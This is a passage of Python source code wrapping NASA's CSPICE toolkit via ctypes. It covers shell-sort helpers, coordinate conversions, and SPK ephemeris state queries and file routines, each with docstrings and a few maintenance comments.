    :type ndim: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: The array to be sorted.
    :type array: list of str.
    :return: The sorted array.
    :rtype: list of str.
    """
    # Build a mutable ndim x lenvals char array; CSPICE sorts it in place.
    array = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
    ndim = ctypes.c_int(ndim)
    lenvals = ctypes.c_int(lenvals)
    libspice.shellc_c(ndim, lenvals, ctypes.byref(array))
    return stypes.cVectorToPython(array)
@spiceErrorCheck
def shelld(ndim, array):
    """
    Sort a double precision array using the Shell Sort algorithm.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shelld_c.html

    :param ndim: Dimension of the array.
    :type ndim: int
    :param array: The array to be sorted.
    :type array: Array of floats
    :return: The sorted array.
    :rtype: Array of floats
    """
    # CSPICE sorts the buffer in place; convert it back afterwards.
    buf = stypes.toDoubleVector(array)
    c_ndim = ctypes.c_int(ndim)
    libspice.shelld_c(c_ndim, ctypes.cast(buf, ctypes.POINTER(ctypes.c_double)))
    return stypes.cVectorToPython(buf)
@spiceErrorCheck
def shelli(ndim, array):
    """
    Sort an integer array using the Shell Sort algorithm.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shelli_c.html

    :param ndim: Dimension of the array.
    :type ndim: int
    :param array: The array to be sorted.
    :type array: Array of ints
    :return: The sorted array.
    :rtype: Array of ints
    """
    # CSPICE sorts the buffer in place; convert it back afterwards.
    buf = stypes.toIntVector(array)
    c_ndim = ctypes.c_int(ndim)
    libspice.shelli_c(c_ndim, ctypes.cast(buf, ctypes.POINTER(ctypes.c_int)))
    return stypes.cVectorToPython(buf)
def sigerr(message):
    """
    Inform the CSPICE error processing mechanism that an error has
    occurred, and specify the type of error.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sigerr_c.html

    :param message: A short error message.
    :type message: str
    """
    # NOTE(review): unlike the neighboring wrappers, this one is not decorated
    # with @spiceErrorCheck -- presumably deliberate, since sigerr itself sets
    # the error status; confirm before adding the decorator.
    message = stypes.stringToCharP(message)
    libspice.sigerr_c(message)
@spiceErrorCheck
@spiceFoundExceptionThrower
def sincpt(method, target, et, fixref, abcorr, obsrvr, dref, dvec):
    """
    Given an observer and a direction vector defining a ray, compute
    the surface intercept of the ray on a target body at a specified
    epoch, optionally corrected for light time and stellar
    aberration.

    This routine supersedes :func:`srfxpt`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sincpt_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param dref: Reference frame of ray's direction vector.
    :type dref: str
    :param dvec: Ray's direction vector.
    :type dvec: 3-Element Array of floats
    :return:
        Surface intercept point on the target body,
        Intercept epoch,
        Vector from observer to intercept point.
    :rtype: tuple
    """
    # Marshal all inputs to ctypes; outputs are filled in by CSPICE.
    method = stypes.stringToCharP(method)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    dref = stypes.stringToCharP(dref)
    dvec = stypes.toDoubleVector(dvec)
    spoint = stypes.emptyDoubleVector(3)
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    found = ctypes.c_int(0)
    libspice.sincpt_c(method, target, et, fixref, abcorr, obsrvr, dref, dvec,
                      spoint, ctypes.byref(trgepc), srfvec, ctypes.byref(found))
    # The trailing found flag is consumed by @spiceFoundExceptionThrower,
    # which raises when no intercept exists.
    return stypes.cVectorToPython(spoint), trgepc.value, stypes.cVectorToPython(
        srfvec), bool(found.value)
@spiceErrorCheck
def size(cell):
    """
    Return the size (maximum cardinality) of a SPICE cell of any
    data type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/size_c.html

    :param cell: Input cell.
    :type cell: spiceypy.utils.support_types.SpiceCell
    :return: The size of the input cell.
    :rtype: int
    """
    assert isinstance(cell, stypes.SpiceCell)
    cell_ref = ctypes.byref(cell)
    return libspice.size_c(cell_ref)
@spiceErrorCheck
def spd():
    """
    Return the number of seconds in a day.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spd_c.html

    :return: The number of seconds in a day.
    :rtype: float
    """
    # The constant is computed on the CSPICE side; no marshalling required.
    return libspice.spd_c()
@spiceErrorCheck
def sphcyl(radius, colat, slon):
    """
    Convert from spherical coordinates to cylindrical coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphcyl_c.html

    :param radius: Distance of point from origin.
    :type radius: float
    :param colat: Polar angle (co-latitude in radians) of point.
    :type colat: float
    :param slon: Azimuthal angle (longitude) of point (radians).
    :type slon: float
    :return:
        Distance of point from z axis,
        angle (radians) of point from XZ plane,
        Height of point above XY plane.
    :rtype: tuple
    """
    c_radius = ctypes.c_double(radius)
    c_colat = ctypes.c_double(colat)
    c_slon = ctypes.c_double(slon)
    # Outputs are written through the pointers below.
    rho = ctypes.c_double()
    lon = ctypes.c_double()
    z = ctypes.c_double()
    libspice.sphcyl_c(c_radius, c_colat, c_slon, ctypes.byref(rho),
                      ctypes.byref(lon), ctypes.byref(z))
    return rho.value, lon.value, z.value
@spiceErrorCheck
def sphlat(r, colat, lons):
    """
    Convert from spherical coordinates to latitudinal coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphlat_c.html

    :param r: Distance of the point from the origin.
    :type r: float
    :param colat: Angle of the point from positive z axis (radians).
    :type colat: float
    :param lons: Angle of the point from the XZ plane (radians).
    :type lons: float
    :return:
        Distance of a point from the origin,
        Angle of the point from the XZ plane in radians,
        Angle of the point from the XY plane in radians.
    :rtype: tuple
    """
    r = ctypes.c_double(r)
    colat = ctypes.c_double(colat)
    lons = ctypes.c_double(lons)
    radius = ctypes.c_double()
    lon = ctypes.c_double()
    lat = ctypes.c_double()
    # Bug fix: this wrapper previously called sphcyl_c (spherical-to-
    # cylindrical); sphlat_c is the correct CSPICE entry point for the
    # spherical-to-latitudinal conversion documented above.
    libspice.sphlat_c(r, colat, lons, ctypes.byref(radius), ctypes.byref(lon),
                      ctypes.byref(lat))
    return radius.value, lon.value, lat.value
@spiceErrorCheck
def sphrec(r, colat, lon):
    """
    Convert from spherical coordinates to rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphrec_c.html

    :param r: Distance of a point from the origin.
    :type r: float
    :param colat: Angle of the point from the positive Z-axis.
    :type colat: float
    :param lon: Angle of the point from the XZ plane in radians.
    :type lon: float
    :return: Rectangular coordinates of the point.
    :rtype: 3-Element Array of floats
    """
    c_r = ctypes.c_double(r)
    c_colat = ctypes.c_double(colat)
    c_lon = ctypes.c_double(lon)
    rect = stypes.emptyDoubleVector(3)
    libspice.sphrec_c(c_r, c_colat, c_lon, rect)
    return stypes.cVectorToPython(rect)
@spiceErrorCheck
def spkacs(targ, et, ref, abcorr, obs):
    """
    Return the state (position and velocity) of a target body
    relative to an observer, optionally corrected for light time
    and stellar aberration, expressed relative to an inertial
    reference frame.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkacs_c.html

    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Inertial reference frame of output state.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obs: Observer.
    :type obs: int
    :return:
        State of target,
        One way light time between observer and target,
        Derivative of light time with respect to time.
    :rtype: tuple
    """
    targ = ctypes.c_int(targ)
    et = ctypes.c_double(et)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    obs = ctypes.c_int(obs)
    # Outputs: 6-element state vector, light time, and its time derivative.
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    dlt = ctypes.c_double()
    libspice.spkacs_c(targ, et, ref, abcorr, obs, starg, ctypes.byref(lt),
                      ctypes.byref(dlt))
    return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spkapo(targ, et, ref, sobs, abcorr):
    """
    Return the position of a target body relative to an observer,
    optionally corrected for light time and stellar aberration.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkapo_c.html

    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Inertial reference frame of observer's state.
    :type ref: str
    :param sobs: State of observer wrt. solar system barycenter.
    :type sobs: 6-Element Array of floats
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :return:
        Position of target,
        One way light time between observer and target.
    :rtype: tuple
    """
    c_targ = ctypes.c_int(targ)
    c_et = ctypes.c_double(et)
    c_ref = stypes.stringToCharP(ref)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_sobs = stypes.toDoubleVector(sobs)
    ptarg = stypes.emptyDoubleVector(3)
    lt = ctypes.c_double()
    # Note: the CSPICE signature takes sobs before abcorr.
    libspice.spkapo_c(c_targ, c_et, c_ref, c_sobs, c_abcorr, ptarg,
                      ctypes.byref(lt))
    return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkapp(targ, et, ref, sobs, abcorr):
    """
    Deprecated: This routine has been superseded by :func:`spkaps`. This
    routine is supported for purposes of backward compatibility only.

    Return the state (position and velocity) of a target body
    relative to an observer, optionally corrected for light time and
    stellar aberration.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkapp_c.html

    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Inertial reference frame of observer's state.
    :type ref: str
    :param sobs: State of observer wrt. solar system barycenter.
    :type sobs: 6-Element Array of floats
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :return:
        State of target,
        One way light time between observer and target.
    :rtype: tuple
    """
    targ = ctypes.c_int(targ)
    et = ctypes.c_double(et)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    sobs = stypes.toDoubleVector(sobs)
    # Outputs: 6-element state vector and one-way light time.
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkapp_c(targ, et, ref, sobs, abcorr, starg, ctypes.byref(lt))
    return stypes.cVectorToPython(starg), lt.value
@spiceErrorCheck
def spkaps(targ, et, ref, abcorr, stobs, accobs):
    """
    Given the state and acceleration of an observer relative to the
    solar system barycenter, return the state (position and velocity)
    of a target body relative to the observer, optionally corrected
    for light time and stellar aberration. All input and output
    vectors are expressed relative to an inertial reference frame.

    This routine supersedes :func:`spkapp`.

    SPICE users normally should call the high-level API routines
    :func:`spkezr` or :func:`spkez` rather than this routine.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkaps_c.html

    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Inertial reference frame of output state.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param stobs: State of the observer relative to the SSB.
    :type stobs: 6-Element Array of floats
    :param accobs: Acceleration of the observer relative to the SSB.
    :type accobs: 6-Element Array of floats
    :return:
        State of target,
        One way light time between observer and target,
        Derivative of light time with respect to time.
    :rtype: tuple
    """
    targ = ctypes.c_int(targ)
    et = ctypes.c_double(et)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    stobs = stypes.toDoubleVector(stobs)
    accobs = stypes.toDoubleVector(accobs)
    # Outputs: state vector, light time, and light-time derivative.
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    dlt = ctypes.c_double()
    libspice.spkaps_c(targ, et, ref, abcorr, stobs, accobs, starg,
                      ctypes.byref(lt), ctypes.byref(dlt))
    return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spk14a(handle, ncsets, coeffs, epochs):
    """
    Add data to a type 14 SPK segment associated with handle. See
    also :func:`spk14b` and :func:`spk14e`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14a_c.html

    :param handle: The handle of an SPK file open for writing.
    :type handle: int
    :param ncsets: The number of coefficient sets and epochs.
    :type ncsets: int
    :param coeffs: The collection of coefficient sets.
    :type coeffs: Array of floats
    :param epochs: The epochs associated with the coefficient sets.
    :type epochs: Array of floats
    """
    c_handle = ctypes.c_int(handle)
    c_ncsets = ctypes.c_int(ncsets)
    coeff_arr = stypes.toDoubleVector(coeffs)
    epoch_arr = stypes.toDoubleVector(epochs)
    libspice.spk14a_c(c_handle, c_ncsets, coeff_arr, epoch_arr)
@spiceErrorCheck
def spk14b(handle, segid, body, center, framename, first, last, chbdeg):
    """
    Begin a type 14 SPK segment in the SPK file associated with
    handle. See also :func:`spk14a` and :func:`spk14e`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14b_c.html

    :param handle: The handle of an SPK file open for writing.
    :type handle: int
    :param segid: The string to use for segment identifier.
    :type segid: str
    :param body: The NAIF ID code for the body of the segment.
    :type body: int
    :param center: The center of motion for body.
    :type center: int
    :param framename: The reference frame for this segment.
    :type framename: str
    :param first: The first epoch for which the segment is valid.
    :type first: float
    :param last: The last epoch for which the segment is valid.
    :type last: float
    :param chbdeg: The degree of the Chebyshev Polynomial used.
    :type chbdeg: int
    """
    c_handle = ctypes.c_int(handle)
    c_segid = stypes.stringToCharP(segid)
    c_body = ctypes.c_int(body)
    c_center = ctypes.c_int(center)
    c_frame = stypes.stringToCharP(framename)
    c_first = ctypes.c_double(first)
    c_last = ctypes.c_double(last)
    c_chbdeg = ctypes.c_int(chbdeg)
    libspice.spk14b_c(c_handle, c_segid, c_body, c_center, c_frame, c_first,
                      c_last, c_chbdeg)
@spiceErrorCheck
def spk14e(handle):
    """
    End the type 14 SPK segment currently being written to the SPK
    file associated with handle. See also :func:`spk14a` and :func:`spk14b`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14e_c.html

    :param handle: The handle of an SPK file open for writing.
    :type handle: int
    """
    c_handle = ctypes.c_int(handle)
    libspice.spk14e_c(c_handle)
@spiceErrorCheck
def spkcls(handle):
    """
    Close an open SPK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcls_c.html

    :param handle: Handle of the SPK file to be closed.
    :type handle: int
    """
    c_handle = ctypes.c_int(handle)
    libspice.spkcls_c(c_handle)
@spiceErrorCheck
def spkcov(spk, idcode, cover):
    """
    Find the coverage window for a specified ephemeris object in a
    specified SPK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcov_c.html

    :param spk: Name of SPK file.
    :type spk: str
    :param idcode: ID code of ephemeris object.
    :type idcode: int
    :param cover: Window giving coverage in "spk" for "idcode".
    :type cover: spiceypy.utils.support_types.SpiceCell
    """
    # The coverage window must be a double-precision cell (dtype 1);
    # it is filled in place by CSPICE.
    assert isinstance(cover, stypes.SpiceCell)
    assert cover.dtype == 1
    c_spk = stypes.stringToCharP(spk)
    c_idcode = ctypes.c_int(idcode)
    libspice.spkcov_c(c_spk, c_idcode, ctypes.byref(cover))
@spiceErrorCheck
def spkcpo(target, et, outref, refloc, abcorr, obspos, obsctr, obsref):
    """
    Return the state of a specified target relative to an "observer,"
    where the observer has constant position in a specified reference
    frame. The observer's position is provided by the calling program
    rather than by loaded SPK files.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcpo_c.html

    :param target: Name of target ephemeris object.
    :type target: str
    :param et: Observation epoch.
    :type et: float
    :param outref: Reference frame of output state.
    :type outref: str
    :param refloc: Output reference frame evaluation locus.
    :type refloc: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obspos: Observer position relative to center of motion.
    :type obspos: 3-Element Array of floats
    :param obsctr: Center of motion of observer.
    :type obsctr: str
    :param obsref: Frame of observer position.
    :type obsref: str
    :return:
        State of target with respect to observer,
        One way light time between target and observer.
    :rtype: tuple
    """
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_outref = stypes.stringToCharP(outref)
    c_refloc = stypes.stringToCharP(refloc)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obspos = stypes.toDoubleVector(obspos)
    c_obsctr = stypes.stringToCharP(obsctr)
    c_obsref = stypes.stringToCharP(obsref)
    state = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkcpo_c(c_target, c_et, c_outref, c_refloc, c_abcorr, c_obspos,
                      c_obsctr, c_obsref, state, ctypes.byref(lt))
    return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcpt(trgpos, trgctr, trgref, et, outref, refloc, abcorr, obsrvr):
    """
    Return the state, relative to a specified observer, of a target
    having constant position in a specified reference frame. The
    target's position is provided by the calling program rather than by
    loaded SPK files.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcpt_c.html

    :param trgpos: Target position relative to center of motion.
    :type trgpos: 3-Element Array of floats
    :param trgctr: Center of motion of target.
    :type trgctr: str
    :param trgref: Reference frame of target position.
    :type trgref: str
    :param et: Observation epoch.
    :type et: float
    :param outref: Reference frame of output state.
    :type outref: str
    :param refloc: Output reference frame evaluation locus.
    :type refloc: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing ephemeris object.
    :type obsrvr: str
    :return:
        State of target with respect to observer,
        One way light time between target and observer.
    :rtype: tuple
    """
    trgpos = stypes.toDoubleVector(trgpos)
    trgctr = stypes.stringToCharP(trgctr)
    trgref = stypes.stringToCharP(trgref)
    et = ctypes.c_double(et)
    outref = stypes.stringToCharP(outref)
    refloc = stypes.stringToCharP(refloc)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    # Outputs: 6-element state vector and one-way light time.
    state = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkcpt_c(trgpos, trgctr, trgref, et, outref, refloc, abcorr,
                      obsrvr, state, ctypes.byref(lt))
    return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcvo(target, et, outref, refloc, abcorr, obssta, obsepc, obsctr, obsref):
    """
    Return the state of a specified target relative to an "observer,"
    where the observer has constant velocity in a specified reference
    frame. The observer's state is provided by the calling program
    rather than by loaded SPK files.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcvo_c.html

    :param target: Name of target ephemeris object.
    :type target: str
    :param et: Observation epoch.
    :type et: float
    :param outref: Reference frame of output state.
    :type outref: str
    :param refloc: Output reference frame evaluation locus.
    :type refloc: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obssta: Observer state relative to center of motion.
    :type obssta: 6-Element Array of floats
    :param obsepc: Epoch of observer state.
    :type obsepc: float
    :param obsctr: Center of motion of observer.
    :type obsctr: str
    :param obsref: Frame of observer state.
    :type obsref: str
    :return:
        State of target with respect to observer,
        One way light time between target and observer.
    :rtype: tuple
    """
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_outref = stypes.stringToCharP(outref)
    c_refloc = stypes.stringToCharP(refloc)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obssta = stypes.toDoubleVector(obssta)
    c_obsepc = ctypes.c_double(obsepc)
    c_obsctr = stypes.stringToCharP(obsctr)
    c_obsref = stypes.stringToCharP(obsref)
    state = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkcvo_c(c_target, c_et, c_outref, c_refloc, c_abcorr, c_obssta,
                      c_obsepc, c_obsctr, c_obsref, state, ctypes.byref(lt))
    return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcvt(trgsta, trgepc, trgctr, trgref, et, outref, refloc, abcorr, obsrvr):
    """
    Return the state, relative to a specified observer, of a target
    having constant velocity in a specified reference frame. The
    target's state is provided by the calling program rather than by
    loaded SPK files.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcvt_c.html

    :param trgsta: Target state relative to center of motion.
    :type trgsta: 6-Element Array of floats
    :param trgepc: Epoch of target state.
    :type trgepc: float
    :param trgctr: Center of motion of target.
    :type trgctr: str
    :param trgref: Frame of target state.
    :type trgref: str
    :param et: Observation epoch.
    :type et: float
    :param outref: Reference frame of output state.
    :type outref: str
    :param refloc: Output reference frame evaluation locus.
    :type refloc: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing ephemeris object.
    :type obsrvr: str
    :return:
        State of target with respect to observer,
        One way light time between target and observer.
    :rtype: tuple
    """
    c_trgsta = stypes.toDoubleVector(trgsta)
    c_trgepc = ctypes.c_double(trgepc)
    c_trgctr = stypes.stringToCharP(trgctr)
    c_trgref = stypes.stringToCharP(trgref)
    c_et = ctypes.c_double(et)
    c_outref = stypes.stringToCharP(outref)
    c_refloc = stypes.stringToCharP(refloc)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    state = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkcvt_c(c_trgsta, c_trgepc, c_trgctr, c_trgref, c_et, c_outref,
                      c_refloc, c_abcorr, c_obsrvr, state, ctypes.byref(lt))
    return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkez(targ, et, ref, abcorr, obs):
    """
    Return the state (position and velocity) of a target body
    relative to an observing body, optionally corrected for light
    time (planetary aberration) and stellar aberration.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkez_c.html
    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Reference frame of output state vector.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obs: Observing body.
    :type obs: int
    :return:
            State of target,
            One way light time between observer and target.
    :rtype: tuple
    """
    # Output buffers that CSPICE fills in.
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkez_c(ctypes.c_int(targ), ctypes.c_double(et),
                     stypes.stringToCharP(ref), stypes.stringToCharP(abcorr),
                     ctypes.c_int(obs), starg, ctypes.byref(lt))
    return stypes.cVectorToPython(starg), lt.value
@spiceErrorCheck
def spkezp(targ, et, ref, abcorr, obs):
    """
    Return the position of a target body relative to an observing
    body, optionally corrected for light time (planetary aberration)
    and stellar aberration.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkezp_c.html
    :param targ: Target body NAIF ID code.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Reference frame of output position vector.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obs: Observing body NAIF ID code.
    :type obs: int
    :return:
            Position of target,
            One way light time between observer and target.
    :rtype: tuple
    """
    # Output buffers that CSPICE fills in (3-vector position only).
    ptarg = stypes.emptyDoubleVector(3)
    lt = ctypes.c_double()
    libspice.spkezp_c(ctypes.c_int(targ), ctypes.c_double(et),
                      stypes.stringToCharP(ref), stypes.stringToCharP(abcorr),
                      ctypes.c_int(obs), ptarg, ctypes.byref(lt))
    return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkezr(targ, et, ref, abcorr, obs):
    """
    Return the state (position and velocity) of a target body
    relative to an observing body, optionally corrected for light
    time (planetary aberration) and stellar aberration.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkezr_c.html
    :param targ: Target body name.
    :type targ: str
    :param et: Observer epoch.
    :type et: Union[float,Iterable[float]]
    :param ref: Reference frame of output state vector.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obs: Observing body name.
    :type obs: str
    :return:
            State of target,
            One way light time between observer and target.
    :rtype: tuple
    """
    targ = stypes.stringToCharP(targ)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    obs = stypes.stringToCharP(obs)
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    # Scalar epoch: single call, single result pair.
    if not hasattr(et, "__iter__"):
        libspice.spkezr_c(targ, ctypes.c_double(et), ref, abcorr, obs,
                          starg, ctypes.byref(lt))
        return stypes.cVectorToPython(starg), lt.value
    # Iterable epochs: vectorize over et, checking for errors per call.
    states = []
    times = []
    for epoch in et:
        libspice.spkezr_c(targ, ctypes.c_double(epoch), ref, abcorr, obs,
                          starg, ctypes.byref(lt))
        checkForSpiceError(None)
        states.append(stypes.cVectorToPython(starg))
        times.append(lt.value)
    return states, times
@spiceErrorCheck
def spkgeo(targ, et, ref, obs):
    """
    Compute the geometric state (position and velocity) of a target
    body relative to an observing body.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkgeo_c.html
    :param targ: Target body.
    :type targ: int
    :param et: Target epoch.
    :type et: float
    :param ref: Target reference frame.
    :type ref: str
    :param obs: Observing body.
    :type obs: int
    :return: State of target, Light time.
    :rtype: tuple
    """
    # Output buffers that CSPICE fills in.
    state = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    libspice.spkgeo_c(ctypes.c_int(targ), ctypes.c_double(et),
                      stypes.stringToCharP(ref), ctypes.c_int(obs),
                      state, ctypes.byref(lt))
    return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkgps(targ, et, ref, obs):
    """
    Compute the geometric position of a target body relative to an
    observing body.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkgps_c.html
    :param targ: Target body.
    :type targ: int
    :param et: Target epoch.
    :type et: float
    :param ref: Target reference frame.
    :type ref: str
    :param obs: Observing body.
    :type obs: int
    :return: Position of target, Light time.
    :rtype: tuple
    """
    # Output buffers that CSPICE fills in (position only, no velocity).
    position = stypes.emptyDoubleVector(3)
    lt = ctypes.c_double()
    libspice.spkgps_c(ctypes.c_int(targ), ctypes.c_double(et),
                      stypes.stringToCharP(ref), ctypes.c_int(obs),
                      position, ctypes.byref(lt))
    return stypes.cVectorToPython(position), lt.value
@spiceErrorCheck
def spklef(filename):
    """
    Load an ephemeris file for use by the readers. Return that file's
    handle, to be used by other SPK routines to refer to the file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spklef_c.html
    :param filename: Name of the file to be loaded.
    :type filename: str
    :return: Loaded file's handle.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.spklef_c(stypes.stringToCharP(filename), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def spkltc(targ, et, ref, abcorr, stobs):
    """
    Return the state (position and velocity) of a target body
    relative to an observer, optionally corrected for light time,
    expressed relative to an inertial reference frame.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkltc_c.html
    :param targ: Target body.
    :type targ: int
    :param et: Observer epoch.
    :type et: float
    :param ref: Inertial reference frame of output state.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param stobs: State of the observer relative to the SSB.
    :type stobs: 6-Element Array of floats
    :return:
            State of target relative to observer,
            One way light time between observer and target,
            Derivative of light time with respect to time.
    :rtype: tuple
    """
    assert len(stobs) == 6
    # Fixed: c_int lives in ctypes, not the stypes support module;
    # stypes.c_int raised AttributeError on every call.
    targ = ctypes.c_int(targ)
    et = ctypes.c_double(et)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    stobs = stypes.toDoubleVector(stobs)
    starg = stypes.emptyDoubleVector(6)
    lt = ctypes.c_double()
    dlt = ctypes.c_double()
    libspice.spkltc_c(targ, et, ref, abcorr, stobs, starg, ctypes.byref(lt),
                      ctypes.byref(dlt))
    return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spkobj(spk, outCell=None):
    """
    Find the set of ID codes of all objects in a specified SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkobj_c.html
    :param spk: Name of SPK file.
    :type spk: str
    :param outCell: Optional Spice Int Cell.
    :type outCell: spiceypy.utils.support_types.SpiceCell
    """
    # Allocate a default integer cell when the caller did not supply one.
    if not outCell:
        outCell = stypes.SPICEINT_CELL(1000)
    # The cell must be an integer-typed SpiceCell (dtype 2).
    assert isinstance(outCell, stypes.SpiceCell)
    assert outCell.dtype == 2
    libspice.spkobj_c(stypes.stringToCharP(spk), ctypes.byref(outCell))
    return outCell
@spiceErrorCheck
def spkopa(filename):
    """
    Open an existing SPK file for subsequent write.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkopa_c.html
    :param filename: The name of an existing SPK file.
    :type filename: str
    :return: A handle attached to the SPK file opened to append.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.spkopa_c(stypes.stringToCharP(filename), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def spkopn(filename, ifname, ncomch):
    """
    Create a new SPK file, returning the handle of the opened file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkopn_c.html
    :param filename: The name of the new SPK file to be created.
    :type filename: str
    :param ifname: The internal filename for the SPK file.
    :type ifname: str
    :param ncomch: The number of characters to reserve for comments.
    :type ncomch: int
    :return: The handle of the opened SPK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.spkopn_c(stypes.stringToCharP(filename),
                      stypes.stringToCharP(ifname),
                      ctypes.c_int(ncomch), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def spkpds(body, center, framestr, typenum, first, last):
    """
    Perform routine error checks and if all check pass, pack the
    descriptor for an SPK segment
